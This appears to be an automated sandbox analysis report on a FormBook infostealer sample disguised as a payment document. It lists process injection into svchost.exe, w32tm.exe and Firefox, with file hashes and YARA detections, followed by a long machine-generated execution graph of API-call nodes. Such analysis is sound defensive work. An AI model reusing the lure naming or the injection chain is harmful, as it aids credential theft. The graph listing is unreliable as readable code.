                                                                            File size:1'619'968 bytes
                                                                            MD5 hash:24516ED0BCFF1BB18DD58DA6B6919C3E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:04:18:52
                                                                            Start date:13/01/2025
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
                                                                            Imagebase:0x9e0000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:04:19:02
                                                                            Start date:13/01/2025
                                                                            Path:C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe"
                                                                            Imagebase:0x830000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:04:19:04
                                                                            Start date:13/01/2025
                                                                            Path:C:\Windows\SysWOW64\w32tm.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\w32tm.exe"
                                                                            Imagebase:0xe40000
                                                                            File size:92'672 bytes
                                                                            MD5 hash:E55B6A057FDDD35A7380FB2C6811A8EC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:04:19:18
                                                                            Start date:13/01/2025
                                                                            Path:C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe"
                                                                            Imagebase:0x830000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:04:19:36
                                                                            Start date:13/01/2025
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x830000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:2.7%
                                                                              Dynamic/Decrypted Code Coverage:1.1%
                                                                              Signature Coverage:3.4%
                                                                              Total number of Nodes:1575
                                                                              Total number of Limit Nodes:32
                                                                              execution_graph 96366 8e1cad SystemParametersInfoW 96367 8e1044 96372 8e10f3 96367->96372 96369 8e104a 96408 9000a3 29 API calls __onexit 96369->96408 96371 8e1054 96409 8e1398 96372->96409 96376 8e116a 96419 8ea961 96376->96419 96379 8ea961 22 API calls 96380 8e117e 96379->96380 96381 8ea961 22 API calls 96380->96381 96382 8e1188 96381->96382 96383 8ea961 22 API calls 96382->96383 96384 8e11c6 96383->96384 96385 8ea961 22 API calls 96384->96385 96386 8e1292 96385->96386 96424 8e171c 96386->96424 96390 8e12c4 96391 8ea961 22 API calls 96390->96391 96392 8e12ce 96391->96392 96445 8f1940 96392->96445 96394 8e12f9 96455 8e1aab 96394->96455 96396 8e1315 96397 8e1325 GetStdHandle 96396->96397 96398 8e137a 96397->96398 96399 922485 96397->96399 96402 8e1387 OleInitialize 96398->96402 96399->96398 96400 92248e 96399->96400 96462 8ffddb 96400->96462 96402->96369 96403 922495 96472 95011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96403->96472 96405 92249e 96473 950944 CreateThread 96405->96473 96407 9224aa CloseHandle 96407->96398 96408->96371 96474 8e13f1 96409->96474 96412 8e13f1 22 API calls 96413 8e13d0 96412->96413 96414 8ea961 22 API calls 96413->96414 96415 8e13dc 96414->96415 96481 8e6b57 96415->96481 96417 8e1129 96418 8e1bc3 6 API calls 96417->96418 96418->96376 96420 8ffe0b 22 API calls 96419->96420 96421 8ea976 96420->96421 96422 8ffddb 22 API calls 96421->96422 96423 8e1174 96422->96423 96423->96379 96425 8ea961 22 API calls 96424->96425 96426 8e172c 96425->96426 96427 8ea961 22 API calls 96426->96427 96428 8e1734 96427->96428 96429 8ea961 22 API calls 96428->96429 96430 8e174f 96429->96430 96431 8ffddb 22 API calls 96430->96431 96432 8e129c 96431->96432 96433 8e1b4a 96432->96433 96434 8e1b58 96433->96434 96435 8ea961 22 API calls 96434->96435 96436 8e1b63 96435->96436 96437 8ea961 22 API calls 96436->96437 96438 8e1b6e 96437->96438 96439 8ea961 22 API calls 96438->96439 96440 8e1b79 96439->96440 96441 8ea961 22 API calls 96440->96441 96442 8e1b84 96441->96442 96443 8ffddb 22 API calls 96442->96443 96444 8e1b96 RegisterWindowMessageW 96443->96444 96444->96390 96446 8f1981 96445->96446 96454 8f195d 96445->96454 96526 900242 5 API calls __Init_thread_wait 96446->96526 96447 8f196e 96447->96394 96449 8f198b 96449->96454 96527 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96449->96527 96451 8f8727 96451->96447 96529 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96451->96529 96454->96447 96528 900242 5 API calls __Init_thread_wait 96454->96528 96456 8e1abb 96455->96456 96457 92272d 96455->96457 96459 8ffddb 22 API calls 96456->96459 96530 953209 23 API calls 96457->96530 96461 8e1ac3 96459->96461 96460 922738 96461->96396 96465 8ffde0 96462->96465 96463 90ea0c ___std_exception_copy 21 API calls 96463->96465 96464 8ffdfa 96464->96403 96465->96463 96465->96464 96468 8ffdfc 96465->96468 96531 904ead 7 API calls 2 library calls 96465->96531 96467 90066d 96533 9032a4 RaiseException 96467->96533 96468->96467 96532 9032a4 RaiseException 96468->96532 96471 90068a 96471->96403 96472->96405 96473->96407 96534 95092a 28 API calls 96473->96534 96475 8ea961 22 API calls 96474->96475 96476 8e13fc 96475->96476 96477 8ea961 22 API calls 96476->96477 96478 8e1404 96477->96478 96479 8ea961 22 API calls 96478->96479 96480 8e13c6 96479->96480 96480->96412 96482 924ba1 96481->96482 96485 8e6b67 _wcslen 96481->96485 96504 8e93b2 96482->96504 96484 924baa 96484->96484 96486 8e6b7d 96485->96486 96487 8e6ba2 96485->96487 96493 8e6f34 22 API calls 96486->96493 96489 8ffddb 22 API calls 96487->96489 96491 8e6bae 96489->96491 96490 8e6b85 __fread_nolock 96490->96417 96494 8ffe0b 96491->96494 96493->96490 96496 8ffddb 96494->96496 96497 8ffdfa 96496->96497 96499 8ffdfc 96496->96499 96508 90ea0c 96496->96508 96515 904ead 7 API calls 2 library calls 96496->96515 96497->96490 96500 90066d 96499->96500 96516 9032a4 RaiseException 96499->96516 96517 9032a4 RaiseException 96500->96517 96503 90068a 96503->96490 96505 8e93c0 96504->96505 96507 8e93c9 __fread_nolock 96504->96507 96505->96507 96520 8eaec9 96505->96520 96507->96484 96514 913820 _abort 96508->96514 96509 91385e 96519 90f2d9 20 API calls __dosmaperr 96509->96519 96510 913849 RtlAllocateHeap 96512 91385c 96510->96512 96510->96514 96512->96496 96514->96509 96514->96510 96518 904ead 7 API calls 2 library calls 96514->96518 96515->96496 96516->96500 96517->96503 96518->96514 96519->96512 96521 8eaedc 96520->96521 96522 8eaed9 __fread_nolock 96520->96522 96523 8ffddb 22 API calls 96521->96523 96522->96507 96524 8eaee7 96523->96524 96525 8ffe0b 22 API calls 96524->96525 96525->96522 96526->96449 96527->96454 96528->96451 96529->96447 96530->96460 96531->96465 96532->96467 96533->96471 96535 8edee5 96538 8eb710 96535->96538 96539 8eb72b 96538->96539 96540 930146 96539->96540 96541 9300f8 96539->96541 96554 8eb750 96539->96554 96604 9658a2 207 API calls 2 library calls 96540->96604 96544 930102 96541->96544 96547 93010f 96541->96547 96541->96554 96602 965d33 207 API calls 96544->96602 96565 8eba20 96547->96565 96603 9661d0 207 API calls 2 library calls 96547->96603 96550 9303d9 96550->96550 96552 8ebbe0 40 API calls 96552->96554 96553 8fd336 40 API calls 96553->96554 96554->96552 96554->96553 96557 8eba4e 96554->96557 96558 930322 96554->96558 96554->96565 96569 8eec40 96554->96569 96593 8ea81b 41 API calls 96554->96593 96594 8fd2f0 40 API calls 96554->96594 96595 8fa01b 207 API calls 96554->96595 96596 900242 5 API calls __Init_thread_wait 96554->96596 96597 8fedcd 22 API calls 96554->96597 96598 9000a3 29 API calls __onexit 96554->96598 96599 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96554->96599 96600 8fee53 82 API calls 96554->96600 96601 8fe5ca 207 API calls 96554->96601 96605 8eaceb 23 API calls ISource 96554->96605 96606 93f6bf 23 API calls 96554->96606 96607 8ea8c7 22 API calls __fread_nolock 96554->96607 96608 965c0c 82 API calls 96558->96608 96565->96557 96609 95359c 82 API calls __wsopen_s 96565->96609 96587 8eec76 ISource 96569->96587 96570 8efef7 96585 8eed9d ISource 96570->96585 96613 8ea8c7 22 API calls __fread_nolock 96570->96613 96573 8ffddb 22 API calls 96573->96587 96574 934600 96574->96585 96612 8ea8c7 22 API calls __fread_nolock 96574->96612 96575 934b0b 96615 95359c 82 API calls __wsopen_s 96575->96615 96581 8ea8c7 22 API calls 96581->96587 96582 900242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96582->96587 96583 8efbe3 96583->96585 96586 934bdc 96583->96586 96592 8ef3ae ISource 96583->96592 96584 8ea961 22 API calls 96584->96587 96585->96554 96616 95359c 82 API calls __wsopen_s 96586->96616 96587->96570 96587->96573 96587->96574 96587->96575 96587->96581 96587->96582 96587->96583 96587->96584 96587->96585 96588 9000a3 29 API calls pre_c_initialization 96587->96588 96590 934beb 96587->96590 96591 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96587->96591 96587->96592 96610 8f01e0 207 API calls 2 library calls 96587->96610 96611 8f06a0 41 API calls ISource 96587->96611 96588->96587 96617 95359c 82 API calls __wsopen_s 96590->96617 96591->96587 96592->96585 96614 95359c 82 API calls __wsopen_s 96592->96614 96593->96554 96594->96554 96595->96554 96596->96554 96597->96554 96598->96554 96599->96554 96600->96554 96601->96554 96602->96547 96603->96565 96604->96554 96605->96554 96606->96554 96607->96554 96608->96565 96609->96550 96610->96587 96611->96587 96612->96585 96613->96585 96614->96585 96615->96585 96616->96590 96617->96585 96618 9003fb 96619 900407 CallCatchBlock 96618->96619 96647 8ffeb1 96619->96647 96621 90040e 96622 900561 96621->96622 96626 900438 96621->96626 96674 90083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96622->96674 96624 900568 96675 904e52 28 API calls _abort 96624->96675 96635 900477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96626->96635 96658 91247d 96626->96658 96627 90056e 96676 904e04 28 API calls _abort 96627->96676 96631 900576 96632 900457 96634 9004d8 96666 900959 96634->96666 96635->96634 96670 904e1a 38 API calls 2 library calls 96635->96670 96638 9004de 96639 9004f3 96638->96639 96671 900992 GetModuleHandleW 96639->96671 96641 9004fa 96641->96624 96642 9004fe 96641->96642 96643 900507 96642->96643 96672 904df5 28 API calls _abort 96642->96672 96673 900040 13 API calls 2 library calls 96643->96673 96646 90050f 96646->96632 96648 8ffeba 96647->96648 96677 900698 IsProcessorFeaturePresent 96648->96677 96650 8ffec6 96678 902c94 10 API calls 3 library calls 96650->96678 96652 8ffecb 96657 8ffecf 96652->96657 96679 912317 96652->96679 96655 8ffee6 96655->96621 96657->96621 96659 912494 96658->96659 96660 900a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96659->96660 96661 900451 96660->96661 96661->96632 96662 912421 96661->96662 96663 912450 96662->96663 96664 900a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96663->96664 96665 912479 96664->96665 96665->96635 96754 902340 96666->96754 96669 90097f 96669->96638 96670->96634 96671->96641 96672->96643 96673->96646 96674->96624 96675->96627 96676->96631 96677->96650 96678->96652 96683 91d1f6 96679->96683 96682 902cbd 8 API calls 3 library calls 96682->96657 96684 91d213 96683->96684 96687 91d20f 96683->96687 96684->96687 96689 914bfb 96684->96689 96686 8ffed8 96686->96655 96686->96682 96701 900a8c 96687->96701 96690 914c07 CallCatchBlock 96689->96690 96708 912f5e EnterCriticalSection 96690->96708 96692 914c0e 96709 9150af 96692->96709 96694 914c1d 96700 914c2c 96694->96700 96722 914a8f 29 API calls 96694->96722 96697 914c27 96723 914b45 GetStdHandle GetFileType 96697->96723 96699 914c3d __wsopen_s 96699->96684 96724 914c48 LeaveCriticalSection _abort 96700->96724 96702 900a95 96701->96702 96703 900a97 IsProcessorFeaturePresent 96701->96703 96702->96686 96705 900c5d 96703->96705 96753 900c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96705->96753 96707 900d40 96707->96686 96708->96692 96710 9150bb CallCatchBlock 96709->96710 96711 9150c8 96710->96711 96712 9150df 96710->96712 96733 90f2d9 20 API calls __dosmaperr 96711->96733 96725 912f5e EnterCriticalSection 96712->96725 96715 9150cd 96734 9127ec 26 API calls pre_c_initialization 96715->96734 96716 9150eb 96719 915117 96716->96719 96726 915000 96716->96726 96718 9150d7 __wsopen_s 96718->96694 96735 91513e LeaveCriticalSection _abort 96719->96735 96722->96697 96723->96700 96724->96699 96725->96716 96736 914c7d 96726->96736 96728 91501f 96744 9129c8 96728->96744 96729 915012 96729->96728 96743 913405 11 API calls 2 library calls 96729->96743 96732 915071 96732->96716 96733->96715 96734->96718 96735->96718 96741 914c8a _abort 96736->96741 96737 914cca 96751 90f2d9 20 API calls __dosmaperr 96737->96751 96738 914cb5 RtlAllocateHeap 96739 914cc8 96738->96739 96738->96741 96739->96729 96741->96737 96741->96738 96750 904ead 7 API calls 2 library calls 96741->96750 96743->96729 96745 9129d3 RtlFreeHeap 96744->96745 96749 9129fc __dosmaperr 96744->96749 96746 9129e8 96745->96746 96745->96749 96752 90f2d9 20 API calls __dosmaperr 96746->96752 96748 9129ee GetLastError 96748->96749 96749->96732 96750->96741 96751->96739 96752->96748 96753->96707 96755 90096c GetStartupInfoW 96754->96755 96755->96669 96756 8e2de3 96757 8e2df0 __wsopen_s 96756->96757 96758 8e2e09 96757->96758 96759 922c2b ___scrt_fastfail 96757->96759 96772 8e3aa2 96758->96772 96761 922c47 GetOpenFileNameW 96759->96761 96763 922c96 96761->96763 96765 8e6b57 22 API calls 96763->96765 96767 922cab 96765->96767 96767->96767 96769 8e2e27 96800 8e44a8 96769->96800 96830 921f50 96772->96830 96775 8e3ace 96778 8e6b57 22 API calls 96775->96778 96776 8e3ae9 96836 8ea6c3 96776->96836 96779 8e3ada 96778->96779 96832 8e37a0 96779->96832 96782 8e2da5 96783 921f50 __wsopen_s 96782->96783 96784 8e2db2 GetLongPathNameW 96783->96784 96785 8e6b57 22 API calls 96784->96785 96786 8e2dda 96785->96786 96787 8e3598 96786->96787 96788 8ea961 22 API calls 96787->96788 96789 8e35aa 96788->96789 96790 8e3aa2 23 API calls 96789->96790 96791 8e35b5 96790->96791 96792 9232eb 96791->96792 96793 8e35c0 96791->96793 96798 92330d 96792->96798 96854 8fce60 41 API calls 96792->96854 96842 8e515f 96793->96842 96799 8e35df 96799->96769 96855 8e4ecb 96800->96855 96803 923833 96877 952cf9 96803->96877 96805 8e4ecb 94 API calls 96807 8e44e1 96805->96807 96806 923848 96809 923869 96806->96809 96810 92384c 96806->96810 96807->96803 96808 8e44e9 96807->96808 96811 923854 96808->96811 96812 8e44f5 96808->96812 96814 8ffe0b 22 API calls 96809->96814 96927 8e4f39 96810->96927 96933 94da5a 82 API calls 96811->96933 96926 8e940c 136 API calls 2 library calls 96812->96926 96827 9238ae 96814->96827 96817 8e2e31 96818 923862 96818->96809 96819 923a5f 96824 923a67 96819->96824 96820 8e4f39 68 API calls 96820->96824 96824->96820 96935 94989b 82 API calls __wsopen_s 96824->96935 96826 8e9cb3 22 API calls 96826->96827 96827->96819 96827->96824 96827->96826 96903 94967e 96827->96903 96906 950b5a 96827->96906 96912 8ea4a1 96827->96912 96920 8e3ff7 96827->96920 96934 9495ad 42 API calls _wcslen 96827->96934 96831 8e3aaf GetFullPathNameW 96830->96831 96831->96775 96831->96776 96833 8e37ae 96832->96833 96834 8e93b2 22 API calls 96833->96834 96835 8e2e12 96834->96835 96835->96782 96837 8ea6dd 96836->96837 96838 8ea6d0 96836->96838 96839 8ffddb 22 API calls 96837->96839 96838->96779 96840 8ea6e7 96839->96840 96841 8ffe0b 22 API calls 96840->96841 96841->96838 96843 8e516e 96842->96843 96847 8e518f __fread_nolock 96842->96847 96845 8ffe0b 22 API calls 96843->96845 96844 8ffddb 22 API calls 96846 8e35cc 96844->96846 96845->96847 96848 8e35f3 96846->96848 96847->96844 96849 8e3605 96848->96849 96853 8e3624 __fread_nolock 96848->96853 96851 8ffe0b 22 API calls 96849->96851 96850 8ffddb 22 API calls 96852 8e363b 96850->96852 96851->96853 96852->96799 96853->96850 96854->96792 96936 8e4e90 LoadLibraryA 96855->96936 96860 8e4ef6 LoadLibraryExW 96944 8e4e59 LoadLibraryA 96860->96944 96861 923ccf 96863 8e4f39 68 API calls 96861->96863 96865 923cd6 96863->96865 96867 8e4e59 3 API calls 96865->96867 96869 923cde 96867->96869 96868 8e4f20 96868->96869 96870 8e4f2c 96868->96870 96966 8e50f5 96869->96966 96872 8e4f39 68 API calls 96870->96872 96874 8e44cd 96872->96874 96874->96803 96874->96805 96876 923d05 96878 952d15 96877->96878 96879 8e511f 64 API calls 96878->96879 96880 952d29 96879->96880 97100 952e66 96880->97100 96883 8e50f5 40 API calls 96884 952d56 96883->96884 96885 8e50f5 40 API calls 96884->96885 96886 952d66 96885->96886 96887 8e50f5 40 API calls 96886->96887 96888 952d81 96887->96888 96889 8e50f5 40 API calls 96888->96889 96890 952d9c 96889->96890 96891 8e511f 64 API calls 96890->96891 96892 952db3 96891->96892 96893 90ea0c ___std_exception_copy 21 API calls 96892->96893 96894 952dba 96893->96894 96895 90ea0c ___std_exception_copy 21 API calls 96894->96895 96896 952dc4 96895->96896 96897 8e50f5 40 API calls 96896->96897 96898 952dd8 96897->96898 96899 9528fe 27 API calls 96898->96899 96900 952dee 96899->96900 96901 952d3f 96900->96901 97106 9522ce 96900->97106 96901->96806 96904 8ffe0b 22 API calls 96903->96904 96905 9496ae __fread_nolock 96904->96905 96905->96827 96907 950b65 96906->96907 96908 8ffddb 22 API calls 96907->96908 96909 950b7c 96908->96909 97266 8e9cb3 96909->97266 96913 8ea52b 96912->96913 96919 8ea4b1 __fread_nolock 96912->96919 96915 8ffe0b 22 API calls 96913->96915 96914 8ffddb 22 API calls 96916 8ea4b8 96914->96916 96915->96919 96917 8ffddb 22 API calls 96916->96917 96918 8ea4d6 96916->96918 96917->96918 96918->96827 96919->96914 96921 8e400a 96920->96921 96925 8e40ae 96920->96925 96922 8ffe0b 22 API calls 96921->96922 96924 8e403c 96921->96924 96922->96924 96923 8ffddb 22 API calls 96923->96924 96924->96923 96924->96925 96925->96827 96926->96817 96928 8e4f43 96927->96928 96930 8e4f4a 96927->96930 96929 90e678 67 API calls 96928->96929 96929->96930 96931 8e4f6a FreeLibrary 96930->96931 96932 8e4f59 96930->96932 96931->96932 96932->96811 96933->96818 96934->96827 96935->96824 96937 8e4ea8 GetProcAddress 96936->96937 96938 8e4ec6 96936->96938 96939 8e4eb8 96937->96939 96941 90e5eb 96938->96941 96939->96938 96940 8e4ebf FreeLibrary 96939->96940 96940->96938 96974 90e52a 96941->96974 96943 8e4eea 96943->96860 96943->96861 96945 8e4e6e GetProcAddress 96944->96945 96946 8e4e8d 96944->96946 96947 8e4e7e 96945->96947 96949 8e4f80 96946->96949 96947->96946 96948 8e4e86 FreeLibrary 96947->96948 96948->96946 96950 8ffe0b 22 API calls 96949->96950 96951 8e4f95 96950->96951 97026 8e5722 96951->97026 96953 8e4fa1 __fread_nolock 96954 8e50a5 96953->96954 96955 923d1d 96953->96955 96965 8e4fdc 96953->96965 97029 8e42a2 CreateStreamOnHGlobal 96954->97029 97040 95304d 74 API calls 96955->97040 96958 923d22 96960 8e511f 64 API calls 96958->96960 96959 8e50f5 40 API calls 96959->96965 96961 923d45 96960->96961 96962 8e50f5 40 API calls 96961->96962 96964 8e506e ISource 96962->96964 96964->96868 96965->96958 96965->96959 96965->96964 97035 8e511f 96965->97035 96967 923d70 96966->96967 96968 8e5107 96966->96968 97062 90e8c4 96968->97062 96971 9528fe 97083 95274e 96971->97083 96973 952919 96973->96876 96977 90e536 CallCatchBlock 96974->96977 96975 90e544 96999 90f2d9 20 API calls __dosmaperr 96975->96999 96977->96975 96979 90e574 96977->96979 96978 90e549 97000 9127ec 26 API calls pre_c_initialization 96978->97000 96980 90e586 96979->96980 96981 90e579 96979->96981 96991 918061 96980->96991 97001 90f2d9 20 API calls __dosmaperr 96981->97001 96985 90e58f 96986 90e5a2 96985->96986 96987 90e595 96985->96987 97003 90e5d4 LeaveCriticalSection __fread_nolock 96986->97003 97002 90f2d9 20 API calls __dosmaperr 96987->97002 96988 90e554 __wsopen_s 96988->96943 96992 91806d CallCatchBlock 96991->96992 97004 912f5e EnterCriticalSection 96992->97004 96994 91807b 97005 9180fb 96994->97005 96998 9180ac __wsopen_s 96998->96985 96999->96978 97000->96988 97001->96988 97002->96988 97003->96988 97004->96994 97011 91811e 97005->97011 97006 918177 97007 914c7d _abort 20 API calls 97006->97007 97008 918180 97007->97008 97010 9129c8 _free 20 API calls 97008->97010 97012 918189 97010->97012 97011->97006 97011->97011 97017 918088 97011->97017 97021 90918d EnterCriticalSection 97011->97021 97022 9091a1 LeaveCriticalSection 97011->97022 97012->97017 97023 913405 11 API calls 2 library calls 97012->97023 97014 9181a8 97024 90918d EnterCriticalSection 97014->97024 97018 9180b7 97017->97018 97025 912fa6 LeaveCriticalSection 97018->97025 97020 9180be 97020->96998 97021->97011 97022->97011 97023->97014 97024->97017 97025->97020 97027 8ffddb 22 API calls 97026->97027 97028 8e5734 97027->97028 97028->96953 97030 8e42bc FindResourceExW 97029->97030 97031 8e42d9 97029->97031 97030->97031 97032 9235ba LoadResource 97030->97032 97031->96965 97032->97031 97033 9235cf SizeofResource 97032->97033 97033->97031 97034 9235e3 LockResource 97033->97034 97034->97031 97036 8e512e 97035->97036 97037 923d90 97035->97037 97041 90ece3 97036->97041 97040->96958 97044 90eaaa 97041->97044 97043 8e513c 97043->96965 97047 90eab6 CallCatchBlock 97044->97047 97045 90eac2 97057 90f2d9 20 API calls __dosmaperr 97045->97057 97046 90eae8 97059 90918d EnterCriticalSection 97046->97059 97047->97045 97047->97046 97050 90eac7 97058 9127ec 26 API calls pre_c_initialization 97050->97058 97051 90eaf4 97060 90ec0a 62 API calls 2 library calls 97051->97060 97054 90eb08 97061 90eb27 LeaveCriticalSection __fread_nolock 97054->97061 97056 90ead2 __wsopen_s 97056->97043 97057->97050 97058->97056 97059->97051 97060->97054 97061->97056 97065 90e8e1 97062->97065 97064 8e5118 97064->96971 97066 90e8ed CallCatchBlock 97065->97066 97067 90e900 ___scrt_fastfail 97066->97067 97068 90e92d 97066->97068 97069 90e925 __wsopen_s 97066->97069 97078 90f2d9 20 API calls __dosmaperr 97067->97078 97080 90918d EnterCriticalSection 97068->97080 97069->97064 97071 90e937 97081 90e6f8 38 API calls 4 library calls 97071->97081 97074 90e91a 97079 9127ec 26 API calls pre_c_initialization 97074->97079 97075 90e94e 97082 90e96c LeaveCriticalSection __fread_nolock 97075->97082 97078->97074 97079->97069 97080->97071 97081->97075 97082->97069 97086 90e4e8 97083->97086 97085 95275d 97085->96973 97089 90e469 97086->97089 97088 90e505 97088->97085 97090 90e478 97089->97090 97091 90e48c 97089->97091 97097 90f2d9 20 API calls __dosmaperr 97090->97097 97096 90e488 __alldvrm 97091->97096 97099 91333f 11 API calls 2 library calls 97091->97099 97093 90e47d 97098 9127ec 26 API calls pre_c_initialization 97093->97098 97096->97088 97097->97093 97098->97096 97099->97096 97105 952e7a 97100->97105 97101 8e50f5 40 API calls 97101->97105 97102 952d3b 97102->96883 97102->96901 97103 9528fe 27 API calls 97103->97105 97104 8e511f 64 API calls 97104->97105 97105->97101 97105->97102 97105->97103 97105->97104 97107 9522d9 97106->97107 97109 9522e7 97106->97109 97108 90e5eb 29 API calls 97107->97108 97108->97109 97110 95232c 97109->97110 97111 90e5eb 29 API calls 97109->97111 97134 9522f0 97109->97134 97135 952557 40 API calls __fread_nolock 97110->97135 97112 952311 97111->97112 97112->97110 97114 95231a 97112->97114 97114->97134 97143 90e678 97114->97143 97115 952370 97116 952395 97115->97116 97117 952374 97115->97117 97136 952171 97116->97136 97120 952381 97117->97120 97122 90e678 67 API calls 97117->97122 97123 90e678 67 API calls 97120->97123 97120->97134 97121 95239d 97124 9523c3 97121->97124 97125 9523a3 97121->97125 97122->97120 97123->97134 97156 9523f3 74 API calls 97124->97156 97127 9523b0 97125->97127 97128 90e678 67 API calls 97125->97128 97129 90e678 67 API calls 97127->97129 97127->97134 97128->97127 97129->97134 97130 9523ca 97131 9523de 97130->97131 97132 90e678 67 API calls 97130->97132 97133 90e678 67 API calls 97131->97133 97131->97134 97132->97131 97133->97134 97134->96901 97135->97115 97137 90ea0c ___std_exception_copy 21 API calls 97136->97137 97138 95217f 97137->97138 97139 90ea0c ___std_exception_copy 21 API calls 97138->97139 97140 952190 97139->97140 97141 90ea0c ___std_exception_copy 21 API calls 97140->97141 97142 95219c 97141->97142 97142->97121 97144 90e684 CallCatchBlock 97143->97144 97145 90e695 97144->97145 97146 90e6aa 97144->97146 97174 90f2d9 20 API calls __dosmaperr 97145->97174 97155 90e6a5 __wsopen_s 97146->97155 97157 90918d EnterCriticalSection 97146->97157 97149 90e69a 97175 9127ec 26 API calls pre_c_initialization 97149->97175 97150 90e6c6 97158 90e602 97150->97158 97153 90e6d1 97176 90e6ee LeaveCriticalSection __fread_nolock 97153->97176 97155->97134 97156->97130 97157->97150 97159 90e624 97158->97159 97160 90e60f 97158->97160 97164 90e61f 97159->97164 97177 90dc0b 97159->97177 97209 90f2d9 20 API calls __dosmaperr 97160->97209 97163 90e614 97210 9127ec 26 API calls pre_c_initialization 97163->97210 97164->97153 97170 90e646 97194 91862f 97170->97194 97173 9129c8 _free 20 API calls 97173->97164 97174->97149 97175->97155 97176->97155 97178 90dc23 97177->97178 97179 90dc1f 97177->97179 97178->97179 97180 90d955 __fread_nolock 26 API calls 97178->97180 97183 914d7a 97179->97183 97181 90dc43 97180->97181 97211 9159be 62 API calls 4 library calls 97181->97211 97184 914d90 97183->97184 97185 90e640 97183->97185 97184->97185 97186 9129c8 _free 20 API calls 97184->97186 97187 90d955 97185->97187 97186->97185 97188 90d961 97187->97188 97189 90d976 97187->97189 97212 90f2d9 20 API calls __dosmaperr 97188->97212 97189->97170 97191 90d966 97213 9127ec 26 API calls pre_c_initialization 97191->97213 97193 90d971 